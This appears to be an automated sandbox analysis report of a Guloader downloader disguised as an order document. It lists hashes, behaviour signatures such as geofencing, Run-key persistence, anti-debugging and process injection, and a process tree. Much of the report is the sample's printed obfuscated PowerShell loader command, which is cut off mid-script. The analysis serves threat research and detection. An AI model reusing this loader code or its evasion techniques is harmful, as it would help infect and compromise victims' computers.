Analysis

  • max time kernel
    139s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 10:18

General

  • Target

    Signed_RFQ_Order.exe

  • Size

    575KB

  • MD5

    a17b25fd47b12083ca9e7ac1113563e0

  • SHA1

    43c2787d8d2dacf959ced9ef03fce78bd974c195

  • SHA256

    1cb00eec4e790856cd41b150ced2cd44b04b67c6210745baaedadd3f3d4bb390

  • SHA512

    51263fe7f9a45da7f4ea01065b4602dd570c9d18ad5910310d83af14065983007aa86b11b92fa7899b8fd4d9020ad95da9f054c461e8b4829233e8b83ab93ead

  • SSDEEP

    12288:aa7zkUqQM2Ij9lbegEsP+McXvgtorYgsqyYUSz7dULXim1:lzk8ClCgqMcXvCSYgHueg

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Signed_RFQ_Order.exe
    "C:\Users\Admin\AppData\Local\Temp\Signed_RFQ_Order.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5024
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle minimized $fe32 = Get-Content 'C:\Users\Admin\AppData\Roaming\Tullibees13\irreciprocity\Borickite\Lydsidens\Tellys\Rindes.Gaa' ; powershell.Exe "$fe32"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3540
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Stamtavlen Varighedskrav Procuracies Indemnitet #>$Madreporarian = """Mo;asFadu EnWicMetPuiMeoSinbo StVRyAReROp5Sp3Ka Hy{Cr Bo El Ge SypAgaDorPea Um T(En[ DSBet SrOmitinStgUn]Pr`$FoH hididRua RlskgfloIn)Fa;li Na`$LoDReeBrlSciLrvAfeJarUreHurLa Wh=Mo Tr`$DeHMeiFodViaSmlRegAfo S.FaLMaeCon HgGuttih Q;Ev B o Ga F`$DeKWraRemStmStePrrGrjSeuUrnSnkmoeFarMueArnFia ssmasGrisun ue GtPerArcFah HaCliNesBetIn Be=El sNReeInwFo-ReOMabEij TeudcBrtwh PhbSvyRetSpeSm[Ad]Da Me(St`$PlD VeStlKniAuv Tefer Ce Gr A Ta/Re B2un)sp; s M`$ BEPeuMocRorLgyWopfsh BiCuaShcAfeJaoEpuMis A=Ex'SkSTiUMa'Ud+Un'OmBDeSUnT DR PI CNGeGNe'Ve;Ua Il Pl Ta ThF UoBlrUr(Re`$NopPerUno Ss CtcaeFlr CnCh=In0 K;Fo Bo`$krpFurBaoGesCrt peSmrNon U R-Bil PtCr Do`$ReDDeeSmlCai DvByeHirMeePur I;La Re`$SnpTurPyoNrsCatTreFrrPhn P+In=Re2Ca)Au{Pa Pj Ge Da Br Bl V Ak Op`$HaKFiaArm RmPlesprrejEkuTyn ZkIne LrMieUrn SaInsInsEyiPunToeOvtSir DcGahStaFoiHosUrtDi[ L`$Ump DrFroNosZytOxe Ar An S/Ok2Ko]Br Ud=Es Ta[ShcUdoBynwrvMae HrRetNe]Ub:Ad: DT AoMiB Ay PtIneMi(To`$LyHSeiUndUnaInlDegQuo U.Sk`$hiELeuEccDer TytrpFihBri TaPrc FeCooAcuNysAa.CiIStnVavAfoflkFee B(tr`$PypExr SoTis ItRue UrDrnLi,De As2Re)Bi, G An1An6Fo)Li;Re C Ca`$ GKGeaSkmBimBieHyrUajKouMinExkKoe UrHae Tn SaEnsNosSpiFon HePutAarUgcAfh Oa FiEus dtUs[ S`$FopBar RoStsMatHueGurLinSw/ I2Se]Br H= F ReFInesatDuiTrp Ba PrSooTeuEpsSt9Ve5Ba8St Fu`$fjKFeaDemBrmPeepur SjInuDenRek Pe SrLeeabnDiaSasFrsSpibon SeGetGrrokcCrhDraKiiVesStt K[Gr`$OvpFlrEcokdsSmtkeeEkr UnAl/Ra2So]Ni A1Kd6Ex7Tv;Pr K Eb Pu Ov}Ho tu[PeSBut FrMeiTanDrgFu]In[CrS Jy Ks PtGaeGrmpl.UnTluecrxAbtOc. IEDan Ic ro FdChi untegUn]tr:La: FAEkSFaCGeIReIIt.BlG Ke DtNdSCotturFoiBenUvgst( G`$UdK eaBnmbamHoePurOrjDau FnShkAneJurLieAbnanaLys lsOviEsnTaeGutShruncEvhReaSti BsDitFa)Ky; v}Af`$PrSKoaPonSagPrpGld MaDag EoIsgBeeParKinDee Os T0Fu=FoVUdAMoRSe5St3Ea In'SlFDr4TiD AEBaD B4ScDFo3 VCOm2NeC BAWh8Ri9LeCMe3DaCfoBReC NBPs'Re; P`$DaSCha Cnskg PpMidFoaNagAno SgHae Lr FnSeeCesFr1Ko=RuVQuALkR L5At3Wi Sa' SEflAPaCAfEPiCMu4SaDRi5 ICSl8McDus4CeCPr8 OCEr1TrDAl3Mo8 S9DyFBa0OvC SETaCUn9do9Me4Te9In5Di8Ep9AbFOu2SpC R9BrDAn4JeC I6AfCAn1 MCPo2BuESk9SuCpa6MoDEn3UnC iEBoD B1GrCPa2KlEFoAAfCKr2SeDAb3 HCTeFSwCRe8WiCSt3OrDBe4 U'Hj; B`$KaSFia FnNig Mp fdTiaergCaoKigBreVirGrnuneTes K2Ra= TV SA QRIm5Re3Op Un' KEHi0SuCDe2SeDDr3TyF D7SaD F5UnCFu8alCCa4BiEVi6OpCAw3HyCma3UnD K5VaCTa2UnDhe4SeDDi4Ev'Br; E`$SpSrea bnTigTupMod IaSlg KoGeg beUgr SnKoeOrsBe3Ti=SpVUnAFeROv5Ne3Ge u' SFFi4ChDPyENoD T4StD T3TeCDe2 OCFlAdi8Ot9SpF E5ExDBa2PaCSv9SiDAl3GeCUnEPaC sAAkC P2La8Ar9 FEBoEByCCo9YdD T3ViCAf2RdD B5DeCMi8UnDbi7PaFAn4 uCFi2DaDfl5ChD M1BrCInEBeCGi4BeCSt2 lDAb4Ex8 e9NeE UF HC o6MaC K9AvCBr3TiCDaBVaCFl2leFIl5TrCUn2TrCFa1Be' t; B`$ThSNoaChnTigBrpMidboa NgOsoargFreharDynIdeSksMi4Pr=FeVInAUnROv5Pr3 V Sm'KnDHa4CoD S3KaDMa5 KC PECaCHi9 PCPr0Ta'Id; R`$ GSFeaUdnjugWip BdBoaMigeroSugIreSprLenfieFlsju5An= PVviA PRIn5St3 K H'UdEHo0NoCFo2 QDPh3ReECiATeCAr8ChCMi3BiDGa2MuCUnBDeCMe2SuE SF NCBy6rtCNr9unCAk3 cC IBFaC B2No'Op; H`$OvS SaCanMogAnpPrdUnaDrgTioinghoeUnrsan JescsSt6Un=EtV BAKaROp5Na3 B Va'UnFUn5SlFTr3goFNe4 hDRe7KoCVu2NoC S4PaCSqE TCzo6ToCKoBReEBo9InCUn6 ACBoA ACFo2Co8InB A8ef7SoEseFOvCBrEPlCab3chC B2DeE C5ZiD AEPoFIn4BeC HEMuCSv0Qe8PlBFl8ti7 FFTa7UdD C2KuCSp5EmCTiBFsCSoEKnCno4Br'so;Sv`$ PSHaa Dn NginpkldReaBrgHaoMigDieStrFyndoeKosIn7Sc= HVTrACoRsk5Va3 P Tw'brFMe5 NDRe2KlCDi9deDRe3mdCAtE DCBeALdC G2 L8 ABte8Ne7 FE DAAlCSy6EcCAb9SgC A6ReC O0SpCac2DaCma3Pa'Pe; O`$ PSRoaSonBog FpFedUnaDig SoTegAfeMarFonEmeLis T8Cy= CV OABeR O5Na3 L S'DeFCo5 SCoc2NoCUm1leCLuB ECUn2 RCKi4TaDNe3LuCUd2 CCun3 PESk3 tCho2VeCOvBTaCDy2 SC u0SkCan6 bDLe3AnCSy2 M' C;st`$prSMeaCanRegAcp IdSvaMigunoUdgIneLar Un ReZosEk9Di=noVLeAtoR v5Ov3Pr Go'SkEYaE aCSo9FlEBeASeCOl2ReCKoAScC A8SaDMe5SpD FEBrEGrA ACDi8EnCLe3grDHe2SnCMnBHoCUh2Kl'An;mh`$MaRCaeInvBaoMilHauTat SiAfoAcnPoiTesMytAm0bu= PV NAEgRMe5Ov3Ce Di'PrEUnATaD NE RESp3LyCPe2TiCReB SCov2 SCRi0seCIr6FeDGr3TaC S2 UFsl3GeDSaEGrDMi7OpCDa2 M'Al;Be`$ToR PekevGloAmlUnuHotCai To TnFoiSpsKotDe1dd=CaV UAKnRUn5Im3Sp Ke'SwECo4GuCRoBTeCNb6 MD T4MiDTh4Su8ClBGr8Br7scFDe7 FDSe2ReCBe5 ECReB PCFiEDeCKr4Fe8BoBno8Up7 BFWa4LaCfo2SuCRu6ShCElBKaCIn2BrCUi3 S8SeB T8Si7 BE f6PlCAf9ReDPo4PoC WEBeE R4SmCFoBAlC F6LuDOr4ViDCh4Fo8CaBSt8Ti7GeEAd6StD S2VeDSt3doCDo8 RE P4LiCtiBOcCre6SiDsa4CoDin4fo'Da; A`$MeRMieStvMyoValnauUotBiiSnoGenAniAlsCatUn2Fi=EoVBiAAdRLn5 A3 O Fr' sE TEOpCTe9FiDDi1TiCOv8MoCBoCEkCTv2So'Va; F`$ApRTieUpvbaoAllkauLytmoiUloInnTnivosCitAm3Ti=BiVSeA YRtr5De3 B Wi'TiFUn7 BDRe2 DCMo5LiCDrB FCurEStCKt4Be8SkBPe8Fo7LeEMaFSpCFaESuCPa3StCSl2HoEsu5ReDLoE PF R4UnCFdEcoCSe0Pl8BaBOs8Sa7KoEOp9SmCEm2FoDfo0FaFCo4DeCneB RC R8BaDNo3Bo8FaB u8Sh7 BFEa1 ICReEDeDSp5 HDKo3SkDSn2OvCFl6ThCMeBOp'Ta; M`$ByRSheDevUdoMolArusytAriBooKrnfeiResautEl4 I=RuVLoAUrRDa5Fo3sa Ep'NaFEy1CrCHeEAdD M5SaD g3 SDsa2PaCOr6PhCBoBOvEPo6TuCFoBRyCEkBPoCKv8 OCMa4Ov'Sk;Ka`$BeRbie TvAfoDalSiuFotbeiCeo BnPri EsMat R5Ma=GaVPoAFeRGr5Fe3Ka Be'KiCFe9ReDSp3KaCHe3AmCPlBPiCHaB T'Mi;Al`$ DRBaeQuv Ro IlEwuDvtIniJaoBrnHeiUdscatFu6 H=CaVPoA mRSu5br3re Ra'AkEUn9ByD T3ApFCo7UnDMa5OvCTi8FiDRe3DrCEx2 FCLi4UnDtr3UnFDo1FrCKrEheDAm5GuDAx3AvD u2BrCSt6ChCMeBVaE AA DCGe2AuC FACeCZy8miD O5NeDPeEAn' D;La`$VrRFoeElvSaoBol VuzatHoiSkoEjnfoistsDetDe7 E=MaVLvAMoRKr5 P3 D T' AEmeEAnEUn2KoFErFHi' P;bo`$UnRTeeUdvEnosklOpuArt kiMioRan CiRhsTatIn8 U=prVDrAFrRCo5As3Be Af' AF MBtr'Di;Pi`$AlKExiDvnTrgChsGgl EePiySa6Di2 P= KVMiAPuRTy5Ma3Re D'AlFKu2DeFOb4SkESt2AmFUn5Di9jo4re9My5Af' N;Hu`$ViKRalVaaSit FrDyiFontrgCo=bhV BAOpRAz5bi3Di De'TrEIn4CoC B6ObCDoB cCsiBHyF M0InCStEDiCaf9ReCBe3 TCQu8leDAf0FoFCo7 SDSe5TiCAn8BoCUn4PiEAn6 A'Lu;BufDouGynTicHet TiLaoTenRo AfJek Kpeu Di{OxPLiaOvrSnaNemhe Lo(Kr`$ImMUdo PscoqBou OiPotUnoTa1mm7 C4Ri,Se Be`$KaKAnaudm amZie BrMoj FuBenBlkSteRer DeAsn RiDiaIncUduKomstiMenBeaSttKve B)Ga La Bo Se Pe C;Go`$SoS EpDeaDelnit peSpfDuo Kr AmPoe Fnla0Qu Kr=BiVSpAEmRMa5Ta3 P Ef' t8Un3orCreBFaCAn6 IDBu5WrD V4MeCPa2UpCMa9Un8Pr7Ve9RoATa8Be7Bu8AcF MFLaC RETo6 LDSa7PrD R7DiE K3 AC F8PaCElAOvCSk6haCTiEGaCfo9TrFAnA H9FrD U9GeD TEBa4 GDWe2LeD K5BrDNo5LaCDi2SkCRe9AdDHu3GeEUd3KoCMa8BlChyAKuCSt6 RCOpESlC S9Sa8 D9UnEOu0 UCVi2arD i3LoE A6CaDEk4 GD S4ImCIm2OrCHyARaCBu5 SCBeBStCOvEPeCBu2YoD T4Lo8 LF F8HuERe8Ko7OuDFoB A8Hu7EdFDg0BuCroFScCBe2ViDsa5BlCSl2Ha8VrAMiEHo8JeCPr5 BC ODPeC A2LiCFi4VlDFa3Ba8Dr7 SDStCGu8 B7Av8Vr3SlFek8Se8An9SeEUn0 SC FBTvCSt8faC U5sqCPl6SuCVoBRiENo6LaD U4 LDSp4PaCSe2UnC EABlCTh5RaCRiBSvDZeEFrE S4EfC q6 CCTe4peCGrF jCSk2Bl8me7Se8AnAAsEEs6 PC R9NoCmu3Su8Un7Ba8ba3UoFPa8Ce8 s9PrEFoBUdCTu8InCKi4SaCNo6AiD K3 SCIrEChCEx8haCna9Sh8Bo9FeFtr4 BDUn7BeCRaBhoCFaEStD S3 F8HiFPr8Kr3 PFHa5FoC B2 DD A1 hCHa8ScCBrB gDCa2noDEd3PrCScEDaCSa8SeCSt9moCPsEFaD S4BlDOv3Ph9TaF J8RuE RFReCst8EnATa9 F6ReFUnABe8Ki9InE B2SaDRi6 FDLi2NiCOu6 BC lB SDDe4Ad8 RFUn8Op3RiF F4reCTh6 SCFo9KbCDe0ClDsk7UnCSu3BeCEn6StCLi0scCEu8DrCTw0BiCSk2 PDTk5RiCsp9DiCNg2SiDBl4Sa9Et7Un8 RE F8Ny7BaDArA I8KlEAf8Fi9SuEfo0TaCEr2PaDCo3SiFMo3UnD NEilDUl7DeCCl2Ch8DoFMa8Co3KoFHy4BoCTe6PoCUn9HaCUn0CiDMa7 DCte3DeCKl6 LCha0AuCRe8SkCAt0ToCMe2CaDJa5BeC F9TeCLa2AlDDe4Sa9 A6Ab8AvEOm'Qu;De&An(Pe`$CoR ReLyvAfoUslPouMutSti DoTrnSaiBos Atsk7Ud)He vo`$PeSUrpTiaUvlfetAreKrfReo FrPam He FnIm0St;St`$UdSUdpSaaKalFltAleBufGrodurUdm MeSpnLa5Su C=Do NeVInAKoRAp5 O3Pr No'Br8Fe3HjFDr2OfC UFUnDDeEJaCMo0 jCOv0NaC O2 CDmi4UzD U3SkCPi2AnCstAReCSy9ReCWiEHoCTa9reCLu0faCTr2UnDDi5RkD F4Lu8Pi7 G9TrATa8Ma7Ka8Fo3LiC pBPhCAr6PiD H5VaDMa4 CCSl2DyCch9Mo8No9 AEAf0LuC s2SoD G3KaEToAHeCBi2HoD P3ovCAsF ACOp8HoCBe3Os8 RF T8Th3SyF T4SoCEj6SaCKa9CoCSl0 EDQu7SkCkv3 KCPi6BhCPa0IdCRe8 NC D0 BCSa2TaDWh5 ZCFa9 RCGe2SaDSt4Ov9Sv5up8UnBBe8Sk7 NFunCOuFNu3leDPoELuDDe7ExCCh2BuFudCPeFSyATaFStAUn8Eq7BlEVa7Un8SkFUn8Ch3 kFPa4 OC U6PeCSk9OlCHa0opDHj7MeCSk3KiCxe6SeCbl0CeCGi8GlCbo0ecCFl2SvDBl5HyCMe9FrCBo2FyDAd4 b9Ae4Cl8OpBRe8Eg7 T8cl3DeFHa4DeCPe6phCAr9InCMo0 UDIn7FrCOp3 ICor6SlCAk0 RCUt8UsCAn0UnCPh2MeDAn5AtCpl9 JCun2 SDLe4Pr9Sn3Br8RuEOv8AtESe'No; F&Ti(Zy`$grRSieHovPuoInlKruKatGaiAdoDenHeiInsPotBy7 M)sp Te`$GrSBepSuafolSvtBaeOvfAloZorOumcaeTrntj5 P; V`$efSDapWoaMilRetBueAcfHooBrrComDoeHnnPl1 M La=la DVDdABrRBi5he3Su Ba'PrDMa5InCNe2ClDJa3NoDSp2CyDCe5 SCBl9Ba8Mo7Pa8ha3NeFCr2InCDiFFlDfoEAfCHy0ObC F0DiCGr2GlDVa4InDHy3StCHu2BkCUnASmC G9ReCChEFaC D9InCTr0HuCSp2ReDHj5FeDDi4Cu8In9FiESkEMaCvi9SoD G1BoCgu8GrC SCFjCEs2Se8BeFFi8In3 ICTe9ShDMa2FlC iB SCGaBCr8AnBSp8Sv7 FEBi7Cu8EmF PF UCIsFAn4RiDKlE iDSt4NoDRe3feC I2AkCfiA M8Ab9AnFAu5amDAr2PoCIn9 MDBa3LuCGuESyCKlABeCFo2Kn8Sp9TyEDeEEmC F9SuDKa3HjCRe2foDSk5TyCFu8NaDsa7 GFCi4 TCOv2DeD f5 FDCo1AeCTuE hCNa4SuCAn2 SDPr4Am8Or9 JERgF KCBe6coCSc9InCFo3KeCReB RCMa2ToFSu5LuCDe2FlCla1GrFEqALi8FlF DE D9KrCSt2SkDFa0Su8SoA SEFo8 VCBa5SkCRaDOpC S2 OCHo4HuD V3Ek8 K7OfFMu4SyDGeE TDCo4 MDph3MaCTr2slCBoALa8Nr9stFSt5TiDSe2PlC A9CoDSa3prCOuEInC SA PCFr2Ve8Am9ChELiERoCMy9VeDSl3 GCGa2TaDCh5UnC I8FiDsp7SmFDe4SvCdu2HaD F5FoDSe1reCMyEKiCIn4CoC A2viDBa4 S8Ju9SvE RFRuCRe6 PCKa9 OCMa3spCBeB VC S2 DFRu5SiC F2KrCIc1Fo8ReF U8SkFFaEDi9DuCJo2MaDbr0 C8 AAHaESi8StC P5SuC SDRiC E2SwCSp4 UDMe3 P8Qu7RiE IEKyCAr9StDMa3 IFMo7DrD K3BoD K5Sl8 BENe8KoB H8Ko7Re8HjF E8Mo3GoC LBPrCRo6ReD E5 BDGe4unCDi2BlCNa9 S8Be9poEHa0UnCFr2AnDKr3LoEEnADaCGe2SlDKo3MiCUdFCuCPh8FrCSu3Gy8SsFSp8Do3reFAr4DaCno6ElC S9TiCHe0LuDTi7KrCUn3 RC L6UdC I0PlCSe8ScCLy0 AC A2 DDHu5 UCKo9GaCBa2QuDSk4Sa9St2 b8KoESi8 IE J8Sa9BrE WEIgC D9chD A1GaCAn8MiCIrCChCDe2Li8PeFfo8Co3 LCSa9InDSt2HeCSiB HCseBSt8BrBSt8Su7ShEAn7 D8 kFHa8 K3 EEGoATaCAf8PrDMe4 ADMo6AkD P2SaCPeESpDfu3SlCfl8Um9Su6Un9Br0Sa9se3Re8HjE O8FrERe8 CEhi8PrE F8FaBOm8Se7St8Pu3UnEHaCMaC T6 ACSyASvCOrAviCIn2 IDfl5GoCBoDHaD N2PrCBe9AlCArCHeCBi2BjDTr5AnCGr2HeCSi9SmCThEScC J6SeCLi4 SDBe2PeCFlA PC PEAnC T9 SC C6SuDHa3 MC C2Se8ReEPa8 AEBa'Hu;Ch& A( E`$InRNoeSevAkoGelRouDetFui HoRenHaiBosEat N7 B)Mo Di`$SoSSipBaaStl BtNoeUrf UoSar Um JeesnSy1Be;Fa}Orf Su JnAscAltUniOvoTunPr bG GDspTSa Ov{BoPAraTirOtaYamSk Iw( P[MaPTiaFerUnasomEneExtTueClrEk(NaPStoNisKoi CtpriMuoven B Lu=Sl Hi0Di,Eg iM SaEnnSadunaUntMooflrAfyUd Da=Al di`$BoTRarUnuBleFe)Hy]Sc Su[NoTSkyUdpOpeAn[La]Ru] S Fo`$paKDeaBlmLsm TergrKlj PuWinJokbeeBirBaeBan PaGisDosJoiUnnEkebltPrbVibReeRid Oi CsUrsFlePa,ru[kdPreaHyr MaGymOle UtReeNorMi(mePChoSesKaiRetPeiDeoRfnLr Ba=Ti Tr1 T)Aa]pr Su[LaTSmy gpMeeSw]Sh A`$AdMNyo OrSat Se OrSpeBorTinAueBrsMe S=Su gi[ OVPloJaiEodVe]Un)Tr;So`$AbSTopDia SlOptRaeOvfTooFurKrmKreVan S2 A Sm= C MaVKrAKaRNo5Kr3 A Il'no8Ti3 SESkA MCDr2MaCud3piCMaE iCEm4PsC MEIcCAl9GeClu6InC TBFlDne1 LC Q6ReDLu5EvCEn2MiCMi9AtDOp4Fe8Sa7Bo9ReAdr8 K7RoFInC FETh6OpDCh7 IDSa7 VEMu3UbCMa8HeCNoAReCUk6 CCOvEScCLi9UdF dAma9FeDra9RoDSaEMu4DiDPa2SeD I5EpDIn5KaCEv2 DC A9TvDUn3LoEDe3MiCbo8AgCKeASwCUn6 UC RE TCBr9Va8De9ImEOb3 ACCh2 TCSo1BrCOrEFrCFr9 KC G2EnESi3AnD GEToCPo9ReCSt6MuC IAJaCBeE FCUn4SuEun6 BDIn4SnDAn4ReCEf2SoCKiASkCKo5UnCNoBFoDInE S8 TFAf8VaFAfEtv9UdC E2LiD S0Ma8ReARiEga8NoCLa5BlCPaDPeC V2NoCAa4DeDIn3op8Te7DeF F4HaDSpE ADRe4AkDVi3ExCCh2 SCDiA A8pa9StFAt5 SCAf2FrC C1EtCReBDeC I2YuCAn4SeDAl3ReCYeEInCDd8 BCDi9Em8Un9 SEMi6deDCo4OmD F4SvCDe2GlCOvAUdC A5ImCBaB SD EEkvE S9CaC U6 DCDrAHlCDe2 T8LiFki8So3OvFDr4HaC G6TiCFa9AnC N0trDla7 BC A3 OCIn6BrCPe0 DCIn8VeC O0 NCFr2WrDTe5SuC A9KoCTi2RiDUn4 M9PoFTi8EfEAc8FoEGe8feBLa8Di7UdFKlCMeFsa4 VDFrENdDDe4UnDAn3 BCDe2CeCAfA T8Dr9PlFSu5ReCHe2FaCSh1AgCPlB PC P2VaCCa4ElDFa3HeC CECaCUn8 KC H9 D8 C9OuEmi2UnCenAKlCJoESpD D3Om8Vi9DrEMi6PrD D4BeDRe4NeCIm2AnCLiASaCFi5 PCAdBGrDYiESkE P5 EDDo2StCKlE SCHdBGrCVe3SkCdy2DrDTi5AbEFo6 SCRe4NuClo4ChCOp2soDSt4 ADSt4DeFSaARe9SoDMn9 VDSuF O5urDRa2 OC c9Kl8BoEdr8Ri9 QEIm3 SCSy2MaCIn1YaCDeEMaCan9CoCAg2ovEUn3EvDWeE JCop9OkCMa6LoCfoARiC dERiC E4MiEMaA ACBu8ErCGr3AlDGl2DaCVeB DCHa2Co8GiFIn8 E3UnFSo4 YCDa6rvCAu9DaCRe0FlDEn7 QC S3 SCPa6KaCPe0PhCBe8TaCSk0KjCMl2prDMa5TrCGa9flCam2stD W4St9 GEWa8LdBer8Po7 N8Gt3LiC U1TaCIn6 sCShBStDUn4PrCPa2Pr8 DEVo8 A9PiESa3gaChy2PrCPe1UnCRaESpCFl9 TCAu2DaFSk3GeDImECiDPl7NeCSa2Op8NoFsk8Bo3EpFWe5RaC B2DrDBe1OuCUn8alCinBSlDUr2 SD R3 CCSyESkCIs8PhC T9 pCArEOcD S4 CD S3 G9 A7Fa8ReB F8Ba7In8Be3PiF E5SlCRa2KnDTr1HiCSl8PoCBaBShDSt2 VD G3RuCBaEIlCDi8AuCJo9PoCJaE SDrs4ToDBe3 I9 B6Ra8moBAa8 A7 mF SC SFWh4 PDStEMaD D4OlD s3KoC N2AcC SAKr8Un9HyE CAGrDFr2ThC LBMuDRe3AnCKaEExC C4LeCPh6TnDPi4BeD N3GoEce3ByCUs2VaCDeBSeCSh2 SCOm0SpC P6ScDGe3 PC S2EsFLeANe8GrERe'Se;Rg&Bl( S`$ BRAmeNovdeo RlHuuCut SiSeoUfnfjiSasRetMo7Va)Go Re`$ lSsipMoaZelFrtHaeAwf GoTnrSvmUdeAnn B2Er;Ta`$CeSDipKraDalRetTyeslfStoInrCumGrePrnSt3Pr Md=Mo wiVVrAStRPe5Ur3Va Ri'Ve8Vr3BeEPaA DCNo2opC S3BiCBeEReCGr4PlCAbEAnCUv9SeC S6InC NBKlDUn1KoCCh6TrDMi5CoCHy2CoCTi9BoDEr4 P8Re9stEPa3MeCSe2KrC G1TeCSpENaCUn9QuCRi2saEDs4OvCOu8TaCHo9PlDSu4MaDUn3 BDDr5FoD U2AfC G4OvDBl3 TCSl8MaDCo5Ra8MeF W8We3HyF S4SuCDe6 VCUf9StCSt0 BDIm7 VCSi3UnCKo6BuCTe0PrC v8plCDi0 ACOb2ReDSk5BeCWh9PaCUd2 ADFe4Be9Un1fr8 GBDa8Pr7TeFAlCsuFve4miDHeE sDRe4AnDIn3BaCSa2SeCReAUd8Re9 DFUk5DeCSt2UnCim1 GCCoBSiCFi2StCCo4stDla3 RC MEpiC V8PrC L9Re8Ov9BiEHy4MaCTr6NuC RBdeCCtBBrC iEEpCPu9ZeCIn0 MESe4BeCRe8HaCch9SuDUn1ReCTr2 SC P9DrDgr3SuC EEirCBr8ReCer9AcDke4SvF SASy9InDst9oaDOpFAa4 HDRe3SkCSp6CoCFe9BeCMo3KrCJo6SkDHy5KrC P3Ty8ReBVa8 H7Co8 V3TuEAkCTeC F6 DCEuABeCmoAHeCSk2noDAb5RaCSaDPrDFo2DiCly9 SCBaCGnCSh2AnD G5MiC P2SmC B9RuC H6JeD K4ArDCr4ToCReETeC C9PhCIm2SaDLa3 UCFr5 VC D5LaCUb2HuCGi3GuCToECoDGr4StDSn4TyCun2Sa8brEBu8Fj9ArFAm4GrCUp2MoDLi3 UEFoEBaCbaAAuDDu7SpCKlBViCCo2 NC VACaCMo2KaCDe9CoDJa3CaC H6IbD M3BaCDrEApC A8ChCBr9GrE F1PrCBaBDiCPr6FoCEx0KlD U4Ju8 HFke8Ed3DiFra4OrC H6PrCKo9BaCSl0caD A7RuCMa3 SCSp6BuC O0SpCCa8udCka0SoCDr2BiD E5HiCCo9 NCHo2CoDsg4 C9bl0 P8DoEMu'Ne;Fr&Rn(Af`$SkRAneFav Po BlTeuAmtRhiWaoRanHeiEssDotVa7En)He se`$DeSTapKaa SlKat Ge rfhjoNor SmSleLinNs3Af;ve`$stSThpBeaInlAntVie Fffio Or Em BeUnnUn4 R Da= P SlV KAStRFr5Op3Go Ra'St8Mu3 NEPlAStCSt2SaCIn3UdCAvEmrCOp4 BCTuEOdCCo9SuCAn6 SCFoBPiDSh1SeC Q6GaDUn5CoCsn2 PCCo9 BDMy4Pr8Mi9flE M3 ICUn2hoCSl1PaC NEGoCVi9NoC o2ScEHaAJvCIn2NvDKy3 RC MFPrCTo8SeCRi3fi8RdFCa8Ou3 LFca5ArCFu2SiDSo1HyCRe8GrCSoBBlDSk2OpDBo3 BCSpELeCRe8OrCDi9DoCSpESoDHe4 ADDi3La9Fo5Be8 BB F8Ku7 F8Bi3DiFSt5HjCtr2ToDNr1 TCCo8FrCmdBJuD R2LaDan3FoCGeEDiCBi8RoCBo9FoC KETeD H4MoDMa3Re9By4Ca8FeBEm8Se7Ce8 B3ChEUrASuCRa8KoDLu5ReDTi3 FCTo2anDCo5SoCUg2GuD P5AcCex9AnCBe2CyDLi4He8 VBRe8Op7Fo8Ci3StEhaCBrCBi6PsCBoASaCHeASyCAn2uuDTo5chCMaDDeDGu2KoCBo9grCPoC CCCa2UlDMe5UlCRe2PeCkl9SyCOp6SpDTi4TeDCl4 KCTaEInCPo9BeCGr2CaDCo3 PC E5tiCPo5 SCCo2UrCfo3 RCHaEAlDSu4DiDKo4SaCNo2Fi8ExEov8He9HyFFr4UdCCo2BoDVi3BeEsaEDaCarASkD I7saCEnBauCEl2EmCRaAFuCUn2TrCKr9SpDto3PrCLa6UvDRe3 TCEqEMeCCu8 KC S9 UEPi1SkCStBEgCDi6SaCFr0ThDCy4Si8FoFOu8 U3GrFAl4OmCSu6 KC F9PrCKa0FaD V7 lCTr3BeCru6BoCFo0 gCAr8SeCRe0 PC T2UnD C5PoCLe9 BCMa2KeDRi4Re9gr0 B8TrEhr'Fo;Lu&Rv(Tr`$ChRBieFovjaoFllWauGatPaiImoSonApiSms UtCh7 U)Sn St`$FoSFlp BaSolSetLaeBrf Vo SrPlmTae UnCa4Ni; S`$QuSAppJaaTrlMat TeChfReo Ur kmSpePrnPi5Ly A=Pa TaVSnADiROv5Sk3Py Su'ElDNo5SkC T2ReDRe3DiDPr2NoDgi5 KC h9Ma8aa7La8sa3 SEFoA RCMi2InC K3SiCPrEOvCBa4PrCJeEAsCUn9boCAx6SyCAkB UD T1MoCSt6 SDCh5SpCDa2ClC U9GeDSi4El8Le9 iECh4FlD A5SlCBu2 MCSk6CrDBo3MeCNa2 PFLa3RaDBaEFoDMy7 ECco2 E8 HFAf8EsESp' s; F& B(vi`$ SRWieUnvInoDolReuOgtJeiSko EnvuiResPat S7Mo)Le Tu`$ BSRepHoaPllVetove RfPaoNorSvm SeSkn a5Sp Gv Fr D; r}Me`$GaMasaCocFerSqoPlsFaeflgPomAleSan Ptex A= F ChVQuAAnR D5Fe3Du Ss'SyCBlC FCSk2 PDBe5OpCUn9soC P2EuCHyBPo9Bi4Fa9St5Ac'Ei;De`$SvKFruFap OeHerMaiTin Pg BeStrPunAle O gr=Cy JVBeA IRAr5Bl3Al Km' AD L2 CDSu4 TCOv2PeDPa5Su9Yn4 T9 A5St'Sp; L`$ 